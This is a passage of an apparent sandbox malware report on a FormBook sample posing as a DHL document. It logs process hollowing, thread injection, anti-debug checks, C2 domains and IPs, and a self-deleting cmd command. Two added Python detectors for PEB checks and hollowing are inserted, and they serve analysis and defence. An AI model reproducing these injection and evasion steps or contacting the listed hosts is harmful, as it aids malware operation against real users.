Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04AD8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A2AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A4927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A09240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A17E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A94257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04AD5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04ABD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A32397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A18794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A2DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A2F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AC131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A1FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A1EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04AD8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_04A0F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeCode function: 1_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeMemory allocated: page read and write | page guard
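
The fs:[00000030h] loads listed above are reads of the PEB pointer from the 32-bit TEB. On their own they only say that code inside explorer.exe looks at the PEB, which is all the sandbox signature states; what makes such a read an anti-debugging check is the access that follows it (BeingDebugged at PEB+0x02, NtGlobalFlag at PEB+0x68). The script below is an added example, not part of the report and not code from the sample: it finds both encodings of the instruction in a raw code buffer and looks a few bytes ahead for those follow-up accesses. The `SAMPLE_CODE` bytes and the base address 0x401000 are constructed for the example.

```python
"""Locate 32-bit PEB reads (fs:[30h]) in raw code and guess their purpose.

Added example, not part of the Joe Sandbox report. The opcode encodings are
the standard x86 ones; SAMPLE_CODE is a constructed byte string, not code
taken from the analysed sample.
"""
from __future__ import annotations
import re

# On 32-bit Windows FS points at the TEB and fs:[0x30] holds the PEB pointer.
# "mov r32, dword ptr fs:[30h]" has a short moffs32 form (A1, eax only) and a
# ModRM disp32 form (8B /r with mod=00 rm=101); the reg field selects r32.
_REG_BY_MODRM = {0x05: "eax", 0x0D: "ecx", 0x15: "edx", 0x1D: "ebx",
                 0x25: "esp", 0x2D: "ebp", 0x35: "esi", 0x3D: "edi"}
PEB_READ_PATTERNS = {b"\x64\xa1\x30\x00\x00\x00": "eax"}
for _modrm, _reg in _REG_BY_MODRM.items():
    PEB_READ_PATTERNS[b"\x64\x8b" + bytes([_modrm]) + b"\x30\x00\x00\x00"] = _reg

# Follow-up accesses that turn a PEB read into a debugger check (heuristic:
# the disp8 value is matched, the register is not cross-checked).
#   movzx r32, byte ptr [r+2] / cmp byte ptr [r+2], 0   -> PEB.BeingDebugged
#   mov r32, [r+68h] / test byte ptr [r+68h], 70h        -> PEB.NtGlobalFlag
_PURPOSE = [
    ("BeingDebugged", re.compile(rb"\x0f\xb6[\x40-\x7f]\x02|\x80[\x78-\x7f]\x02\x00")),
    ("NtGlobalFlag", re.compile(rb"\x8b[\x40-\x7f]\x68|\xf6[\x40-\x47]\x68\x70")),
]
LOOKAHEAD = 16  # bytes after the PEB read examined for a follow-up access


def scan_peb_reads(code: bytes, base: int = 0) -> list[dict]:
    """Return every fs:[30h] read in `code` with its address and a purpose guess.

    `base` is the virtual address of code[0], so the reported addresses line
    up with a disassembler or with the "Code function" column of the report.
    """
    hits = []
    for pattern, reg in PEB_READ_PATTERNS.items():
        start = 0
        while (off := code.find(pattern, start)) != -1:
            window = code[off + len(pattern): off + len(pattern) + LOOKAHEAD]
            purpose = "PEB access (follow-up not recognised)"
            for label, rx in _PURPOSE:
                if rx.search(window):
                    purpose = f"{label} check"
                    break
            hits.append({
                "address": base + off,
                "instruction": f"mov {reg}, dword ptr fs:[30h]",
                "purpose": purpose,
            })
            start = off + 1
    return sorted(hits, key=lambda h: h["address"])


# Constructed 32-bit code: a BeingDebugged check followed by an NtGlobalFlag check.
SAMPLE_CODE = (
    b"\x55\x8b\xec"                   # push ebp ; mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00"       # mov eax, dword ptr fs:[30h]
    b"\x0f\xb6\x40\x02"               # movzx eax, byte ptr [eax+2]    ; BeingDebugged
    b"\x85\xc0"                       # test eax, eax
    b"\x75\x10"                       # jnz +0x10
    b"\x64\x8b\x0d\x30\x00\x00\x00"   # mov ecx, dword ptr fs:[30h]
    b"\xf6\x41\x68\x70"               # test byte ptr [ecx+68h], 70h   ; NtGlobalFlag
    b"\x75\x05"                       # jnz +5
    b"\x33\xc0\x5d\xc3"               # xor eax, eax ; pop ebp ; ret
)

if __name__ == "__main__":
    for h in scan_peb_reads(SAMPLE_CODE, base=0x401000):
        print(f"{h['address']:08X}  {h['instruction']:32} {h['purpose']}")
```

Run it over the code section of an unpacked image with `base` set to that section's virtual address and the addresses line up with the 14_2_... identifiers above. Byte scanning ignores instruction boundaries, so hits inside data are false positives, and reading the PEB also has legitimate uses (loader lists, process parameters); the follow-up access, not the read itself, carries the signal.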

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.uenpb.xyz
Source: C:\Windows\explorer.exe | Network Connect: 1.32.255.152 80
Source: C:\Windows\explorer.exe | Domain query: www.wed8029.com
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Section unmapped: C:\Windows\SysWOW64\explorer.exe base address: 290000
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Section loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and write (2 hits)
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\explorer.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Memory written: C:\Users\user\Desktop\DHL DOC 3406506482.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\explorer.exe | Thread register set: target process: 3472
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Process created: C:\Users\user\Desktop\DHL DOC 3406506482.exe C:\Users\user\Desktop\DHL DOC 3406506482.exe
Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\DHL DOC 3406506482.exe"
Source: DHL DOC 3406506482.exe, 00000001.00000002.317544821.00000000033E0000.00000040.00020000.sdmp, explorer.exe, 00000002.00000000.274832594.0000000005EA0000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.259040044.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.294378470.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.277072165.00000000089FF000.00000004.00000001.sdmp, explorer.exe, 00000002.00000000.266615744.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.378029897.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.250811965.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.287126611.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.513755732.0000000003250000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.266615744.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.378029897.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.250811965.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.287126611.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.513755732.0000000003250000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.266615744.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.378029897.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.250811965.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.287126611.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.513755732.0000000003250000.00000002.00020000.sdmp | Binary or memory string: SProgram Managerl
Source: DHL DOC 3406506482.exe, 00000001.00000002.317544821.00000000033E0000.00000040.00020000.sdmp | Binary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
Source: explorer.exe, 00000002.00000000.286668277.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.266152630.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.377694769.0000000001128000.00000004.00000020.sdmp, explorer.exe, 00000002.00000000.250248842.0000000001128000.00000004.00000020.sdmp | Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000002.00000000.266615744.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.378029897.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.250811965.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.287126611.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.513755732.0000000003250000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000002.00000000.266615744.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.378029897.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.250811965.0000000001640000.00000002.00020000.sdmp, explorer.exe, 00000002.00000000.287126611.0000000001640000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.513755732.0000000003250000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Queries volume information: C:\Users\user\Desktop\DHL DOC 3406506482.exe VolumeInformation
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 hits)
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
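
The hollowing indicators above (a section unmapped in explorer.exe, sections mapped execute/read/write, a buffer beginning 4D5A written into another process, the thread context set, an APC queued, then the cmd /c del self-deletion) are individually weak; the verdict comes from correlating them per source/target process pair. The following is an added example, not the sandbox's logic and not code from the sample: it grades a list of cross-process API events into a verdict. The `Event` shape, the API names assigned to each stage and the `TRACE` are constructed for the example; 3472 is used as the target PID only because that is the value in the report's "Thread register set" lines.

```python
"""Correlate cross-process API events into a process-hollowing verdict.

Added example, not part of the Joe Sandbox report. The Event shape and TRACE
are constructed; real input would come from an EDR or sandbox API trace.
The stages mirror what the report flags: a section unmapped in the target,
memory mapped execute/read/write, a buffer starting with MZ (4D5A) written,
the thread context set, an APC queued, and the thread resumed.
"""
from __future__ import annotations
from collections import defaultdict
from dataclasses import dataclass, field

PAGE_EXECUTE_READWRITE = 0x40


@dataclass
class Event:
    """One API call as an API monitor would record it. `target` is the process
    the handle refers to; for calls on the caller's own process it equals `pid`."""
    pid: int
    api: str
    target: int
    args: dict = field(default_factory=dict)


# Stage -> APIs that can satisfy it (constructed list, Win32 and Nt/Zw spellings).
STAGE_APIS = {
    "unmap":    {"NtUnmapViewOfSection", "ZwUnmapViewOfSection"},
    "map_rwx":  {"NtMapViewOfSection", "VirtualAllocEx", "NtAllocateVirtualMemory",
                 "NtProtectVirtualMemory", "VirtualProtectEx"},
    "write_pe": {"WriteProcessMemory", "NtWriteVirtualMemory"},
    "hijack":   {"SetThreadContext", "NtSetContextThread", "Wow64SetThreadContext",
                 "QueueUserAPC", "NtQueueApcThread"},
    "resume":   {"ResumeThread", "NtResumeThread"},
}


def _stage_for(ev: Event) -> str | None:
    """Map one event to a stage. The argument checks keep ordinary cross-process
    activity (non-executable mappings, non-PE writes) out of the chain."""
    for stage, apis in STAGE_APIS.items():
        if ev.api not in apis:
            continue
        if stage == "map_rwx" and ev.args.get("protect") != PAGE_EXECUTE_READWRITE:
            return None
        if stage == "write_pe" and not ev.args.get("data", b"").startswith(b"MZ"):
            return None
        return stage
    return None


def analyze(events: list[Event]) -> dict[tuple[int, int], dict]:
    """Group cross-process events by (source pid, target pid) and grade each pair."""
    chains: dict[tuple[int, int], list[str]] = defaultdict(list)
    for ev in events:
        if ev.pid == ev.target:
            continue  # a process managing its own memory is not injection
        stage = _stage_for(ev)
        if stage and stage not in chains[(ev.pid, ev.target)]:
            chains[(ev.pid, ev.target)].append(stage)

    report = {}
    for pair, stages in chains.items():
        s = set(stages)
        if {"unmap", "write_pe"} <= s and s & {"hijack", "resume"}:
            verdict = "process hollowing"
        elif "write_pe" in s and "hijack" in s:
            verdict = "thread injection"
        elif "map_rwx" in s and "write_pe" in s:
            verdict = "code injection (no thread hijack seen)"
        else:
            verdict = "suspicious cross-process access"
        report[pair] = {"stages": stages, "verdict": verdict}
    return report


DROPPER, EXPLORER = 1234, 3472  # constructed PIDs; 3472 echoes the report's target pid
TRACE = [
    Event(DROPPER, "NtUnmapViewOfSection", EXPLORER, {"base": 0x290000}),
    Event(DROPPER, "NtMapViewOfSection", EXPLORER, {"protect": PAGE_EXECUTE_READWRITE}),
    Event(DROPPER, "WriteProcessMemory", EXPLORER,
          {"base": 0x400000, "data": b"MZ\x90\x00\x03\x00\x00\x00"}),
    Event(DROPPER, "NtSetContextThread", EXPLORER),
    Event(DROPPER, "NtQueueApcThread", EXPLORER),
    Event(DROPPER, "NtResumeThread", EXPLORER),
    # Constructed benign noise: a read-only shared section mapped into a child,
    # a non-PE write, a remote read, and local RWX allocation.
    Event(800, "NtMapViewOfSection", 900, {"protect": 0x02}),
    Event(800, "WriteProcessMemory", 900, {"data": b"config-v2"}),
    Event(600, "ReadProcessMemory", 700),
    Event(500, "VirtualAlloc", 500, {"protect": PAGE_EXECUTE_READWRITE}),
]

if __name__ == "__main__":
    for (src, dst), r in analyze(TRACE).items():
        print(f"{src} -> {dst}: {r['verdict']} via {', '.join(r['stages'])}")
```

The protection and MZ checks are what separate this from a plain "WriteProcessMemory seen" alert; they correspond to the report's "protection: execute and read and write" and "value starts with: 4D5A" fields. Standard Sysmon or Windows Security logging does not expose the Nt* calls, so this shape of correlation needs an API-level source such as a sandbox trace or an EDR that records memory operations.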

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.DHL DOC 3406506482.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.DHL DOC 3406506482.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.DHL DOC 3406506482.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.DHL DOC 3406506482.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.DHL DOC 3406506482.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.DHL DOC 3406506482.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 1.2.DHL DOC 3406506482.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.DHL DOC 3406506482.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.DHL DOC 3406506482.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.DHL DOC 3406506482.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.DHL DOC 3406506482.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.DHL DOC 3406506482.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.DHL DOC 3406506482.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000E.00000002.513609784.0000000002D70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.245861481.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.290164309.00000000070EF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.316002438.0000000000AD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.315948001.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.246580702.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.513416867.0000000002C70000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.512624428.0000000000790000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.275035294.00000000070EF000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.249416535.0000000003799000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.315617862.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Valid Accounts | Shared Modules (1) | Path Interception | Process Injection (6, 1, 2) | Rootkit (1) | Credential API Hooking (1) | Security Software Discovery (2, 2, 1) | Remote Services | Credential API Hooking (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading (1) | LSASS Memory | Process Discovery (2) | Remote Desktop Protocol | Archive Collected Data (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (3) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools (1) | Security Account Manager | Virtualization/Sandbox Evasion (3, 1) | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol (3) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion (3, 1) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (1, 3) | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection (6, 1, 2) | LSA Secrets | System Information Discovery (1, 1, 2) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information (1) | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information (4) | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing (1, 3) | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | File Deletion (1) | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

          Behavior Graph

Behavior Graph ID: 532855 | Sample: DHL DOC 3406506482.exe | Start date: 02/12/2021 | Architecture: WINDOWS | Score: 100

Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures

Process tree (recovered from the graph):
DHL DOC 3406506482.exe (started)
    dropped: C:\Users\user\...\DHL DOC 3406506482.exe.log (ASCII)
    signatures: Injects a PE file into a foreign processes
  DHL DOC 3406506482.exe (started)
      signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    explorer.exe (injected)
        DNS/IP: www.uenpb.xyz 1.32.255.152 (ports 49808, 80) BCPL-SGBGPNETGlobalASNSG Singapore; www.wed8029.com; 192.168.2.1 unknown unknown
        signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
      explorer.exe (started)
          signatures: Self deletion via cmd delete; Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
        cmd.exe (started)
          conhost.exe (started)

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
DHL DOC 3406506482.exe | 29% | Virustotal |
DHL DOC 3406506482.exe | 38% | ReversingLabs | ByteCode-MSIL.Trojan.Lazy

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
14.2.explorer.exe.290000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
14.0.explorer.exe.290000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.DHL DOC 3406506482.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.2.DHL DOC 3406506482.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.0.DHL DOC 3406506482.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
